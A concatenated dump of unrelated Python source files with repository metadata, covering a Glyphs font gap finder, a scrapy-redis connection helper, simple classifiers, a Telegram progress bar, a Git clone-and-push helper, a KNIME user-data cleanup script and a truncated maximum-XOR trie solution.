			return glyphName[:offset]
	def effectiveKerning( self, leftGlyphName, rightGlyphName, thisFont, thisFontMasterID ):
		"""Returns the effective kerning value between the two glyphs in the given master, or 0.0 if none."""
		leftLayer = thisFont.glyphs[leftGlyphName].layers[thisFontMasterID]
		rightLayer = thisFont.glyphs[rightGlyphName].layers[thisFontMasterID]
		effectiveKerning = leftLayer.rightKerningForLayer_( rightLayer )
		# NSNotFound is the API's "no kerning" sentinel; treat it as zero.
		if effectiveKerning < NSNotFound:
			return effectiveKerning
		else:
			return 0.0
	def listOfNamesForCategories( self, thisFont, requiredCategory, requiredSubCategory, requiredScript, excludedGlyphNameParts, excludeNonExporting ):
		"""Collects names of glyphs matching category/subcategory/script, honoring exclusion substrings and export status."""
		nameList = []
		for thisGlyph in thisFont.glyphs:
			thisScript = thisGlyph.script
			glyphName = thisGlyph.name
			nameIsOK = True
			if excludedGlyphNameParts:
				for thisNamePart in excludedGlyphNameParts:
					nameIsOK = nameIsOK and not thisNamePart in glyphName
			if nameIsOK and (thisGlyph.export or not excludeNonExporting):
				# Glyphs without a script (thisScript == None) are accepted for any script.
				if thisScript == None or thisScript == requiredScript:
					if thisGlyph.category == requiredCategory:
						if requiredSubCategory:
							if thisGlyph.subCategory == requiredSubCategory:
								nameList.append( glyphName )
						else:
							nameList.append( glyphName )
		return nameList
	def splitString( self, string, delimiter=":", Maximum=2 ):
		"""Splits *string* at *delimiter*, strips each part, and pads the list with None up to *Maximum* entries.

		Returns None for an effectively empty input string.
		"""
		# split string into a list:
		returnList = string.split(delimiter)
		# remove trailing spaces:
		for i in range(len(returnList)):
			returnList[i] = returnList[i].strip()
		# if necessary fill up with None:
		while len(returnList) < Maximum:
			returnList.append(None)
		if returnList == [""]:
			return None
		return returnList
	def measureLayerAtHeightFromLeftOrRight( self, thisLayer, height, leftSide=True ):
		"""Returns the layer's LSB (leftSide=True) or RSB at the given height, or None if unmeasurable."""
		try:
			if leftSide:
				measurement = thisLayer.lsbAtHeight_(height)
			else:
				measurement = thisLayer.rsbAtHeight_(height)
			if measurement < NSNotFound:
				return measurement
			else:
				return None
		except:
			return None
	def minDistanceBetweenTwoLayers( self, leftLayer, rightLayer, interval=5.0, kerning=0.0, report=False ):
		"""Samples the vertical overlap of the two layers every *interval* units and returns the smallest gap (RSB + LSB + kerning), or None if the shapes never face each other."""
		# correction = leftLayer.RSB+rightLayer.LSB
		# Only the vertical range where both layers overlap needs to be measured.
		topY = min( leftLayer.bounds.origin.y+leftLayer.bounds.size.height, rightLayer.bounds.origin.y+rightLayer.bounds.size.height )
		bottomY = max( leftLayer.bounds.origin.y, rightLayer.bounds.origin.y )
		distance = topY - bottomY
		minDist = None
		for i in range(int(distance//interval)):
			height = bottomY + i * interval
			left = self.measureLayerAtHeightFromLeftOrRight( leftLayer, height, leftSide=False )
			right = self.measureLayerAtHeightFromLeftOrRight( rightLayer, height, leftSide=True )
			try: # avoid gaps like in i or j
				total = left+right+kerning # +correction
				if minDist == None or minDist > total:
					minDist = total
			except:
				pass
		return minDist
	def queryPrefs( self ):
		"""Reads script plus left/right 'Category:Subcategory' selections from the preferences."""
		script = Glyphs.defaults["com.mekkablue.GapFinder.popupScript"]
		firstCategory, firstSubCategory = self.splitString( self.w.popupLeftCat.getItems()[ Glyphs.defaults["com.mekkablue.GapFinder.popupLeftCat"] ] )
		secondCategory, secondSubCategory = self.splitString( self.w.popupRightCat.getItems()[ Glyphs.defaults["com.mekkablue.GapFinder.popupRightCat"] ] )
		return script, firstCategory, firstSubCategory, secondCategory, secondSubCategory
	def GapFinderMain( self, sender ):
		"""Run-button callback: measures all glyph pairs and opens an Edit tab with the pairs whose gap exceeds the maximum distance."""
		try:
			# update settings to the latest user input:
			if not self.SavePreferences( self ):
				print("Note: 'GapFinder' could not write preferences.")
			# query frontmost fontmaster:
			thisFont = Glyphs.font
			thisFontMaster = thisFont.selectedFontMaster
			thisFontMasterID = thisFontMaster.id
			# reset progress bar:
			self.w.bar.set(0)
			# start taking time:
			start = timer()
			# start reporting to macro window:
			if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
				Glyphs.clearLog()
				print("GapFinder Report for %s, master %s:\n" % (thisFont.familyName, thisFontMaster.name))
			# query user input:
			script, firstCategory, firstSubCategory, secondCategory, secondSubCategory = self.queryPrefs()
			step = intervalList[ Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"] ]
			excludedGlyphNameParts = self.splitString( Glyphs.defaults["com.mekkablue.GapFinder.excludeSuffixes"], delimiter=",", Maximum=0 )
			excludeNonExporting = bool( Glyphs.defaults["com.mekkablue.GapFinder.excludeNonExporting"] )
			maxDistance = 200.0 # default
			try:
				maxDistance = float( Glyphs.defaults["com.mekkablue.GapFinder.maxDistance"] )
			except Exception as e:
				print("Warning: Could not read min distance entry. Will default to 200.\n%s" % e)
				import traceback
				print(traceback.format_exc())
				print()
			# save prefs
			if not self.SavePreferences(None):
				print("Note: GapFinder could not write preferences.")
			# get list of glyph names:
			firstList = self.listOfNamesForCategories( thisFont, firstCategory, firstSubCategory, script, excludedGlyphNameParts, excludeNonExporting )
			secondList = self.listOfNamesForCategories( thisFont, secondCategory, secondSubCategory, script, excludedGlyphNameParts, excludeNonExporting )
			if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
				print("Maximum Distance: %i\n" % maxDistance)
				print("Left glyphs:\n%s\n" % ", ".join(firstList))
				print("Right glyphs:\n%s\n" % ", ".join(secondList))
			# Build the Edit-tab text: one line per left glyph, "/left/right/space" per gap found.
			tabString = "\n"
			gapCount = 0
			numOfGlyphs = len(firstList)
			for index in range(numOfGlyphs):
				# update progress bar:
				self.w.bar.set( int(100*(float(index)/numOfGlyphs)) )
				# determine left glyph:
				firstGlyphName = firstList[index]
				leftLayer = thisFont.glyphs[firstGlyphName].layers[thisFontMasterID]
				# cycle through right glyphs:
				for secondGlyphName in secondList:
					rightLayer = thisFont.glyphs[secondGlyphName].layers[thisFontMasterID]
					kerning = self.effectiveKerning( firstGlyphName, secondGlyphName, thisFont, thisFontMasterID )
					distanceBetweenShapes = self.minDistanceBetweenTwoLayers( leftLayer, rightLayer, interval=step, kerning=kerning, report=False )
					if (not distanceBetweenShapes is None) and (distanceBetweenShapes > maxDistance):
						gapCount += 1
						tabString += "/%s/%s/space" % ( firstGlyphName, secondGlyphName )
						if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
							print("- %s %s: %i" % ( firstGlyphName, secondGlyphName, distanceBetweenShapes ))
				tabString += "\n"
			# clean up the tab string:
			tabString = tabString[:-6].replace("/space\n", "\n")
			while "\n\n" in tabString:
				tabString = tabString.replace("\n\n", "\n")
			tabString = tabString[1:]
			# update progress bar:
			self.w.bar.set( 100 )
			# take time:
			end = timer()
			seconds = end - start
			if seconds > 60.0:
				timereport = "%i:%02i minutes" % ( seconds//60, seconds%60 )
			elif seconds < 1.0:
				timereport = "%.2f seconds" % seconds
			elif seconds < 20.0:
				timereport = "%.1f seconds" % seconds
			else:
				timereport = "%i seconds" % seconds
			# open new Edit tab:
			if tabString:
				if len(tabString) > 40:
					# disable reporters (avoid slowdown)
					Glyphs.defaults["visibleReporters"] = None
				report = '%i kerning gaps have been found. Time elapsed: %s.' % (gapCount, timereport)
				thisFont.newTab( tabString )
			# or report that nothing was found:
			else:
				report = 'No collisions found. Time elapsed: %s. Congrats!' % timereport
			# Notification:
			notificationTitle = "GapFinder: %s (%s)" % (thisFont.familyName, thisFontMaster.name)
			Glyphs.showNotification( notificationTitle, report )
			# Report in Macro Window:
			if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
				print(report)
				Glyphs.showMacroWindow()
		except Exception as e:
			print("GapFinder Error: %s" % e)
			import traceback
			print(traceback.format_exc())
GapFinder()
| 42.764205 | 200 | 0.722846 |
acfa6a43cd0579bcbf61907b13c1b60e49b20e49 | 116 | py | Python | src/Chapter6/exercise1.py | group15bse/BSE-2021 | caf2c8ef9812f339bba3bc1e818cdc150d5440d1 | [
"MIT"
] | null | null | null | src/Chapter6/exercise1.py | group15bse/BSE-2021 | caf2c8ef9812f339bba3bc1e818cdc150d5440d1 | [
"MIT"
] | null | null | null | src/Chapter6/exercise1.py | group15bse/BSE-2021 | caf2c8ef9812f339bba3bc1e818cdc150d5440d1 | [
"MIT"
] | 1 | 2021-05-08T11:17:40.000Z | 2021-05-08T11:17:40.000Z | word=input("Enter word:")
index=-1
while index+1>-(len(word)):
letter=word[index]
print(letter)
index-=1 | 19.333333 | 27 | 0.637931 |
acfa6b010ae43685395bcdf4ad4064f0bab9c4b2 | 2,571 | py | Python | src/scrapy_redis/connection.py | Restill/scrapy-redis | ec3a6eb3d2ca08f686cbf926b56ad849b0c55cae | [
"MIT"
] | 1 | 2021-09-03T01:01:50.000Z | 2021-09-03T01:01:50.000Z | src/scrapy_redis/connection.py | Restill/scrapy-redis | ec3a6eb3d2ca08f686cbf926b56ad849b0c55cae | [
"MIT"
] | null | null | null | src/scrapy_redis/connection.py | Restill/scrapy-redis | ec3a6eb3d2ca08f686cbf926b56ad849b0c55cae | [
"MIT"
] | null | null | null | import six
from scrapy.utils.misc import load_object
from . import defaults
# Shortcut maps 'setting name' -> 'parmater name'.
SETTINGS_PARAMS_MAP = {
'REDIS_URL': 'url',
'REDIS_HOST': 'host',
'REDIS_PORT': 'port',
'REDIS_ENCODING': 'encoding',
'REDIS_CLUSTER': 'cluster',
}
def get_redis_from_settings(settings):
"""Returns a redis client instance from given Scrapy settings object.
This function uses ``get_client`` to instantiate the client and uses
``defaults.REDIS_PARAMS`` global as defaults values for the parameters. You
can override them using the ``REDIS_PARAMS`` setting.
Parameters
----------
settings : Settings
A scrapy settings object. See the supported settings below.
Returns
-------
server
Redis client instance.
Other Parameters
----------------
REDIS_URL : str, optional
Server connection URL.
REDIS_HOST : str, optional
Server host.
REDIS_PORT : str, optional
Server port.
REDIS_ENCODING : str, optional
Data encoding.
REDIS_CLUSTER : bool, optional
True for using reids-cluster, False for not.
REDIS_PARAMS : dict, optional
Additional client parameters.
"""
params = defaults.REDIS_PARAMS.copy()
params.update(settings.getdict('REDIS_PARAMS'))
# XXX: Deprecate REDIS_* settings.
for source, dest in SETTINGS_PARAMS_MAP.items():
val = settings.get(source)
if val:
params[dest] = val
# Allow ``redis_cls`` to be a path to a class.
if isinstance(params.get('redis_cls'), six.string_types):
params['redis_cls'] = load_object(params['redis_cls'])
return get_redis(**params)
# Backwards compatible alias.
from_settings = get_redis_from_settings
def get_redis(**kwargs):
    """Returns a redis client instance.

    Parameters
    ----------
    cluster : bool, optional
        If True, default to ``defaults.REDISCLUSTER_CLS`` instead of
        ``defaults.REDIS_CLS``.
    redis_cls : class, optional
        Client class; overrides the cluster-based default.
    url : str, optional
        If given, ``redis_cls.from_url`` is used to instantiate the class.
    **kwargs
        Extra parameters to be passed to the ``redis_cls`` class.

    Returns
    -------
    server
        Redis client instance.

    """
    use_cluster = kwargs.pop('cluster', False)
    default_cls = defaults.REDISCLUSTER_CLS if use_cluster else defaults.REDIS_CLS
    redis_cls = kwargs.pop('redis_cls', default_cls)
    url = kwargs.pop('url', None)
    if url:
        return redis_cls.from_url(url, **kwargs)
    return redis_cls(**kwargs)
| 26.234694 | 79 | 0.643329 |
acfa6bbebb40a259f65c440e21d8c913dffb5bf9 | 1,593 | py | Python | 02_pair/predtool.py | lazyDamon/siamese-neural-networks | a9f395e531ce51be0c85fa66ef091c4a6b1b65f8 | [
"MIT"
] | 8 | 2019-10-22T15:09:49.000Z | 2020-12-26T04:40:47.000Z | 02_pair/predtool.py | GuillerLT/siamese_neural_networks | a9f395e531ce51be0c85fa66ef091c4a6b1b65f8 | [
"MIT"
] | null | null | null | 02_pair/predtool.py | GuillerLT/siamese_neural_networks | a9f395e531ce51be0c85fa66ef091c4a6b1b65f8 | [
"MIT"
] | 4 | 2020-04-27T18:32:11.000Z | 2021-05-17T12:23:50.000Z | import numpy as np
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
def hist(e_tr, y_tr, e_te, y_te):
n_k = len(np.unique(y_tr))
def preddiction(i_te, e_tr):
def distance(i_tr, i_te):
return np.linalg.norm(i_tr - i_te)
return np.argmin(
np.average(
np.reshape(
np.apply_along_axis(distance, 1, e_tr, i_te),
(n_k, -1)
),
1
)
)
# distancias = np.reshape(np.apply_along_axis(distance, 1, e_tr, i_te),
# (len(np.unique(y_te)), -1))
# medias = np.average(distancias, 1)
# indice = np.argmin(medias)
p_te = np.apply_along_axis(preddiction, 1, e_te, e_tr)
acc = (y_te == p_te).mean()
print('Accuracy on test set (hist): %0.4f%%' % (acc))
def acc(clf, str, e_tr, y_tr, e_te, y_te):
    """Fit *clf* on the training split and print its test-set accuracy.

    NOTE(review): the parameter name ``str`` shadows the builtin; kept as-is
    for interface compatibility.
    """
    clf.fit(e_tr, y_tr)
    score = clf.score(e_te, y_te)
    message = 'Accuracy on test set ({}): %0.4f%%'.format(str)
    print(message % (score,))
def svr(e_tr, y_tr, e_te, y_te, kernel='rbf'):
    """Train a support-vector regressor and report its test score via ``acc``."""
    acc(SVR(kernel=kernel, gamma='auto'), ' svr', e_tr, y_tr, e_te, y_te)
def rf(e_tr, y_tr, e_te, y_te, n_estimators=100):
    """Train a random-forest classifier and report its test score via ``acc``."""
    acc(RandomForestClassifier(n_estimators=n_estimators), ' rf', e_tr, y_tr, e_te, y_te)
def knn(e_tr, y_tr, e_te, y_te, n_neighbors=100):
    """Train a k-nearest-neighbors classifier and report its test score via ``acc``."""
    acc(KNeighborsClassifier(n_neighbors), ' knn', e_tr, y_tr, e_te, y_te)
| 31.86 | 80 | 0.565599 |
acfa6c506351bde3469ff23d3e186f34cf454f80 | 330 | py | Python | gallery/urls.py | Nijinsha/Inshare | ebbeb904ae20b997df385cad589121bc46d67728 | [
"MIT"
] | null | null | null | gallery/urls.py | Nijinsha/Inshare | ebbeb904ae20b997df385cad589121bc46d67728 | [
"MIT"
] | null | null | null | gallery/urls.py | Nijinsha/Inshare | ebbeb904ae20b997df385cad589121bc46d67728 | [
"MIT"
] | 1 | 2019-11-21T17:16:49.000Z | 2019-11-21T17:16:49.000Z | from django.urls import path
from .views import PhotoUploadView, PhotoThumbListView, PhotoDeleteView
urlpatterns = [
path('upload/', PhotoUploadView.as_view(), name="upload"),
path('get-thumbs/', PhotoThumbListView.as_view(), name="get_thumbs"),
path('<int:pk>/delete/', PhotoDeleteView.as_view(), name="delete"),
]
| 33 | 73 | 0.724242 |
acfa6ca1b091ce745295596149a7b1ec9e063029 | 2,373 | py | Python | helper_funcs/display_progress.py | kristy-offl/URL-With-BROADCAST | 33b6db252ec9c7d1e69d8386d5fbed10c785776b | [
"MIT"
] | null | null | null | helper_funcs/display_progress.py | kristy-offl/URL-With-BROADCAST | 33b6db252ec9c7d1e69d8386d5fbed10c785776b | [
"MIT"
] | null | null | null | helper_funcs/display_progress.py | kristy-offl/URL-With-BROADCAST | 33b6db252ec9c7d1e69d8386d5fbed10c785776b | [
"MIT"
] | 2 | 2021-10-05T12:10:57.000Z | 2021-11-02T04:46:37.000Z | import os
import math
import time
async def progress_for_pyrogram(
    current,
    total,
    ud_type,
    message,
    start
):
    """Pyrogram progress callback: periodically edits *message* with an HTML progress bar.

    :param current: bytes transferred so far
    :param total: total bytes of the transfer
    :param ud_type: header text shown above the progress details
    :param message: pyrogram message object whose text is edited in place
    :param start: ``time.time()`` timestamp taken when the transfer began
    """
    now = time.time()
    diff = now - start
    # Refresh roughly every 10 seconds, plus once on completion,
    # to avoid hammering Telegram's edit-rate limits.
    if round(diff % 10.00) == 0 or current == total:
        percentage = current * 100 / total
        # BUGFIX: guard against ZeroDivisionError when the callback fires
        # immediately (diff == 0) or before any bytes moved (speed == 0).
        speed = current / diff if diff else 0
        elapsed_time = round(diff) * 1000
        if speed:
            time_to_completion = round((total - current) / speed) * 1000
        else:
            time_to_completion = 0
        estimated_total_time = elapsed_time + time_to_completion

        elapsed_time = TimeFormatter(milliseconds=elapsed_time)
        estimated_total_time = TimeFormatter(milliseconds=estimated_total_time)

        progress = "[{0}{1}] \n<b>➩ Percentage :- {2}%</b>\n".format(
            ''.join(["▣" for i in range(math.floor(percentage / 10))]),
            ''.join(["□" for i in range(10 - math.floor(percentage / 10))]),
            round(percentage, 2))

        tmp = progress + "<b>➩ Completed :- {0}</b>\n<b>➩ Size :- {1}</b>\n<b>➩ Speed :- {2}/s</b>\n<b>➩ ETA :- {3}</b>\n".format(
            humanbytes(current),
            humanbytes(total),
            humanbytes(speed),
            # elapsed_time if elapsed_time != '' else "0 s",
            estimated_total_time if estimated_total_time != '' else "0 s"
        )
        try:
            await message.edit(
                text="{}\n{}".format(
                    ud_type,
                    tmp
                )
            )
        except Exception:
            # Best effort: Telegram may reject the edit (e.g. message not
            # modified, flood wait); the progress display is not critical.
            pass
def humanbytes(size):
    """Render a byte count as a human-readable string ('KiB', 'MiB', ...).

    Returns "" for a falsy size. Based on
    https://stackoverflow.com/a/49361727/4723940
    """
    if not size:
        return ""
    units = (' ', 'Ki', 'Mi', 'Gi', 'Ti')
    value = size
    unit_index = 0
    # Divide down by 1024 until the value fits the current unit.
    while value > 1024:
        value /= 1024
        unit_index += 1
    return "{} {}B".format(round(value, 2), units[unit_index])
def TimeFormatter(milliseconds: int) -> str:
    """Convert a millisecond duration into a '1d, 2h, 3m, 4s, 5ms' string.

    Zero-valued components are omitted; an all-zero duration yields "".
    """
    seconds, milliseconds = divmod(int(milliseconds), 1000)
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    parts = []
    for value, suffix in ((days, "d"), (hours, "h"), (minutes, "m"),
                          (seconds, "s"), (milliseconds, "ms")):
        if value:
            parts.append("{}{}".format(value, suffix))
    return ", ".join(parts)
| 32.067568 | 131 | 0.525917 |
acfa6eb6e0e64a3b0ef181700215e3897a79777d | 261 | py | Python | hunter_douglas/hunter_douglas/doctype/clearance_certificate/clearance_certificate.py | thispl/hunter-douglas | b3a3a8a7087a042703ff33259a62b8b13ca87c82 | [
"MIT"
] | null | null | null | hunter_douglas/hunter_douglas/doctype/clearance_certificate/clearance_certificate.py | thispl/hunter-douglas | b3a3a8a7087a042703ff33259a62b8b13ca87c82 | [
"MIT"
] | null | null | null | hunter_douglas/hunter_douglas/doctype/clearance_certificate/clearance_certificate.py | thispl/hunter-douglas | b3a3a8a7087a042703ff33259a62b8b13ca87c82 | [
"MIT"
] | 1 | 2019-12-31T06:52:12.000Z | 2019-12-31T06:52:12.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2020, VHRS and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class ClearanceCertificate(Document):
    """Frappe controller for the Clearance Certificate doctype.

    No custom behaviour: everything is inherited from frappe's Document.
    """
    pass
| 23.727273 | 49 | 0.785441 |
acfa6ec261c785f593b18712dbf666c5f9008254 | 1,676 | py | Python | clone/helper/git_operations.py | hashmapinc/hdm | a77872bb7a7d151b2a3f7474b15009cea09aa98f | [
"Apache-2.0"
] | 1 | 2021-02-09T00:40:40.000Z | 2021-02-09T00:40:40.000Z | clone/helper/git_operations.py | hashmapinc/hdm | a77872bb7a7d151b2a3f7474b15009cea09aa98f | [
"Apache-2.0"
] | null | null | null | clone/helper/git_operations.py | hashmapinc/hdm | a77872bb7a7d151b2a3f7474b15009cea09aa98f | [
"Apache-2.0"
] | null | null | null | # Copyright © 2020 Hashmap, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import git
from clone.config.netezza_config import NetezzaConfig
class GitOperations:
    """Thin GitPython wrapper: clone a target repo onto the GitLab runner
    and push local changes back to origin/master."""
    def __init__(self, config: NetezzaConfig):
        # Remote URL of the repository to clone.
        self.target_repo_url = config.git_target_repo_url()
        # Local checkout path on the GitLab runner (build agent).
        self.local_gitlab_runner_repo = config.git_local_gitlab_runner_repo()
        # Placeholder until git_clone_target_repo() assigns the git.Repo object.
        self.repo = ""
    def git_clone_target_repo(self):
        """Clone the remote target repo to the local GitLab runner checkout.

        Stores the resulting git.Repo on self.repo for later operations.
        """
        self.repo = git.Repo.clone_from(self.target_repo_url, self.local_gitlab_runner_repo)
        print("Cloning Repo - completed ....")
    def git_commit_and_push(self):
        """Stage everything, commit, and push to origin/master.

        Requires git_clone_target_repo() to have been called first
        (self.repo starts out as a bare string placeholder).
        """
        self.repo.git.add('--all')
        self.repo.index.commit("committed changes")
        origin = self.repo.remote('origin')
        origin.push('master')
        # NOTE(review): this re-stage happens *after* the push and is never
        # committed — looks redundant; confirm intent before removing.
        self.repo.git.add(update=True)
        print("Commit and push changes - completed....")
| 38.090909 | 94 | 0.677208 |
acfa706a0c4e4a8aef94ae07b2723daf3c15fab0 | 3,880 | py | Python | wipe_data_knime_users/wipe_data_knime_users.py | clearpeaks-aba/knime-per-user-executor-starter | 6d757d9687f0ce002a6eb4f17708e5fa77737acf | [
"Apache-2.0"
] | 2 | 2020-11-26T07:01:20.000Z | 2020-11-30T16:05:43.000Z | wipe_data_knime_users/wipe_data_knime_users.py | clearpeaks-aba/knime-per-user-executor-starter | 6d757d9687f0ce002a6eb4f17708e5fa77737acf | [
"Apache-2.0"
] | null | null | null | wipe_data_knime_users/wipe_data_knime_users.py | clearpeaks-aba/knime-per-user-executor-starter | 6d757d9687f0ce002a6eb4f17708e5fa77737acf | [
"Apache-2.0"
] | null | null | null | import os
import pwd
import logging
import json
import sys
import getpass
from logging.handlers import TimedRotatingFileHandler
from datetime import datetime
import pathlib
# --- Command line ------------------------------------------------------
# Exactly one argument is expected: the path of the JSON configuration file.
if len(sys.argv) != 2:
    print('ERROR: Provide configuration file. Usage:')
    print('  ./wipe_data_knime_users.py [JSON configuration file]')
    sys.exit()
# --- Configuration -----------------------------------------------------
# Parse the JSON configuration file; abort with the parse error on failure.
try:
    settings = json.loads(open(sys.argv[1]).read())
except Exception as ex:
    print('ERROR: Parsing configuration file: {}'.format(ex))
    sys.exit()
# The script deletes files owned by arbitrary users, so it must run as root.
if getpass.getuser() != 'root':
    print('ERROR: Run this script with root')
    sys.exit()
# --- Logging -----------------------------------------------------------
# Timed rotating log file; level, path and rotation policy come from settings.
logger = logging.getLogger("wipe_data_knime_users")
logger.setLevel(getattr(logging, settings['log_level'].upper()))
handler = TimedRotatingFileHandler(settings['log_file'], when=settings['log_rotation_when'], interval=settings['log_rotation_interval'], backupCount=settings['log_rotation_keep'])
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
# --- Settings validation -----------------------------------------------
# 'paths' may be a single string or a list of strings; normalize to a list.
pathsToWipe = settings['paths']
if isinstance(settings['paths'], str):
    pathsToWipe = [settings['paths'], ]
elif not isinstance(settings['paths'], list):
    print('ERROR: Parsing configuration file: paths must be a str or a list')
    sys.exit()
# 'just_log' is the dry-run switch: when True nothing is actually deleted.
just_log = settings['just_log']
if not isinstance(just_log, bool):
    logger.error('just_log must be boolean')
    sys.exit()
# Files older than this many days (by mtime) become eligible for deletion.
delete_days = settings['delete_days']
if not isinstance(delete_days, int):
    logger.error('delete_days must be int')
    sys.exit()
# File-name prefixes that are never deleted; normalize str to a list too.
exceptions_startwith = settings['exceptions_startwith']
if isinstance(settings['exceptions_startwith'], str):
    exceptions_startwith = [settings['exceptions_startwith'], ]
elif not isinstance(settings['exceptions_startwith'], list):
    print('ERROR: Parsing configuration file: exceptions_startwith must be a str or a list')
    sys.exit()
# --- Users -------------------------------------------------------------
# Every entry of the KNIME workspaces directory (except '*_temp') is treated
# as a user whose files may be wiped.
users = []
for user in os.listdir(settings["workspaces_dir"]):
    if not user.endswith('_temp'):
        users.append(user)
if len(users):
    logger.info('Users: {}'.format(users))
else:
    logger.error('no users found in {}'.format(settings["workspaces_dir"]))
    sys.exit()
# Reference timestamp for all file-age comparisons below.
now = datetime.now()
def wipe_folder(folder):
    """Recursively delete stale files owned by known users under *folder*.

    Honors the module-level settings: exceptions_startwith (name prefixes
    to skip), users (owners eligible for deletion), delete_days (mtime age
    threshold) and just_log (dry-run switch).
    """
    logger.debug('Checking folder {}'.format(folder))
    for entry in os.listdir(folder):
        entry_path = os.path.abspath(os.path.join(folder, entry))
        # Entries matching any configured prefix are left untouched.
        skip_entry = False
        for prefix in exceptions_startwith:
            if entry.startswith(prefix):
                skip_entry = True
                logger.debug('Ignoring {}'.format(entry_path))
        if skip_entry:
            continue
        if os.path.isfile(entry_path):
            owner = pwd.getpwuid(os.stat(entry_path).st_uid).pw_name
            modified = datetime.fromtimestamp(pathlib.Path(entry_path).stat().st_mtime)
            age = now - modified
            if owner in users and age.days > delete_days:
                logger.info("Deleting {} (now-mtime={}days)".format(entry_path, age.days))
                if not just_log:
                    os.remove(entry_path)
        elif os.path.isdir(entry_path):
            wipe_folder(entry_path)
# Walk every configured path; only directories that exist are wiped.
for pathToWipe in pathsToWipe:
    if not os.path.exists(pathToWipe):
        # Logger.warn is a deprecated alias; warning() emits the same record.
        logger.warning('{} does not exist. Ignoring folder.'.format(pathToWipe))
    elif os.path.isfile(pathToWipe):
        logger.warning('{} is a file. Ignoring file.'.format(pathToWipe))
    else:
        # It is a folder that exists
        wipe_folder(pathToWipe)
acfa7187d96493909c69622875c93ad37396c5d4 | 2,674 | py | Python | pyalgo/__init__.py | gilad-dotan/pyalgo_pkg | 132ff3c032c3fc0ae910201611e5d2cde387eb74 | [
"MIT"
] | 1 | 2021-04-01T08:59:30.000Z | 2021-04-01T08:59:30.000Z | pyalgo/__init__.py | gilad-dotan/pyalgo_pkg | 132ff3c032c3fc0ae910201611e5d2cde387eb74 | [
"MIT"
] | null | null | null | pyalgo/__init__.py | gilad-dotan/pyalgo_pkg | 132ff3c032c3fc0ae910201611e5d2cde387eb74 | [
"MIT"
] | null | null | null | print("...DONE...")
# python -m pip install --user --upgrade setuptools wheel
# python -m pip install --user --upgrade twine
# python setup.py sdist bdist_wheel
# python -m twine upload --repository testpypi dist/* <-- upload to test Pypi
# python -m twine upload dist/* <-- upload to Pypi
#You can use
#[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)
#to write your content with the markdown protocol.
# // Mission Log \\
#
# algocryption.pipeline --> add "save_key" and "load_key"
#
# algocryption --> add to "simple columnar transposition" the option to have a 'chunk_size' as a list
#
#
# algocryption --> add "MD5"
# algocryption --> add "RC4"
# algocryption --> add "RC5"
# algocryption --> add "RC6"
# algocryption --> add "DES"
# algocryption --> add "IDEA"
# algocryption --> add "HMAC"
# algocryption --> add "Rijndael"
# algocryption --> add "TripleDES"
# algocryption --> add "fence gate"
# algocryption --> add "Caesar cipher"
# algocryption --> add "sha algorithms"
# algocryption --> add "Vigenere Cipher"
# algocryption --> add "Playfair Cipher"
# algocryption --> add "monoalphabetic cipher"
# algocryption --> add "MD5 encryption algorithm"
# algocryption --> add "IDEA encryption algorithm"
# algocryption --> add "HMAC encryption algorithm"
# algocryption --> add "shamir secret sharing scheme"
# algocryption --> add "Cryptographic hash functions"
# algocryption --> add "Twofish encryption algorithm"
# algocryption --> add "Blowfish encryption algorithm"
# algocryption --> add "Advanced Encryption Standard (AES)"
# algocryption --> add "ECC Asymmetric Encryption Algorithm"
# algocryption --> add "Elliptic Curve Digital Signature Algorithm" (ECDSA)
#
# pytrainer --> ML_functions // add lambda to Normal_Equation
# pytrainer --> ML_functions // complete Cost_function_Grad -> linear regression \\
# pytrainer --> ML_functions // complete Cost_function -> logistic regression \\
# pytrainer --> ML_functions // complete Cost_function_Grad -> logistic regression \\
#
# pytrainer --> ML_functions // complete gradient_descent \\
# pytrainer --> ML_functions_Training // complete forward_propagation \\ (add forward propagation to neural network)
#
#
# sortalgo --> try to optimize "quick sort"
# sortalgo --> try to use recursion in "quick sort"
#
#
# basic_modules --> in "default_functions" try to optimize "to_single_list", maybe with regression
# basic_modules --> in "default_functions" try to use regression
# basic_modules --> in "default_functions" fix "_8chunk_to_7chunk" and "_8chunk_to_7chunk" to include the flag bites
| 37.661972 | 117 | 0.704188 |
acfa71983ab6a993166921696d573c92cd7ae639 | 2,173 | py | Python | HackerRank/Interview Preparation Kit/Miscellaneous/MaximumXOR.py | Anni1123/competitive-programming | bfcc72ff3379d09dee22f30f71751a32c0cc511b | [
"MIT"
] | 1 | 2021-04-03T13:33:00.000Z | 2021-04-03T13:33:00.000Z | HackerRank/Interview Preparation Kit/Miscellaneous/MaximumXOR.py | iamsuryakant/competitive-programming | 413000f5bc4a627407e1335c35dcdbee516e8cc1 | [
"MIT"
] | null | null | null | HackerRank/Interview Preparation Kit/Miscellaneous/MaximumXOR.py | iamsuryakant/competitive-programming | 413000f5bc4a627407e1335c35dcdbee516e8cc1 | [
"MIT"
] | 2 | 2021-01-23T14:35:48.000Z | 2021-03-15T05:04:24.000Z | #!/bin/python3
import math
import os
import random
import re
import sys
def to_binary_str(number):
    """Binary digits of *number*, without Python's '0b' prefix."""
    with_prefix = bin(number)
    return with_prefix[2:]
def build_trie(numbers_array, max_len):
    """Build a nested-dict bit trie of the numbers, each padded to max_len bits."""
    trie = {}
    for number in numbers_array:
        # Zero-pad so every path through the trie has the same depth; this
        # way queries never have to deal with leftover bits while matching.
        bits = bin(number)[2:].zfill(max_len)
        node = trie
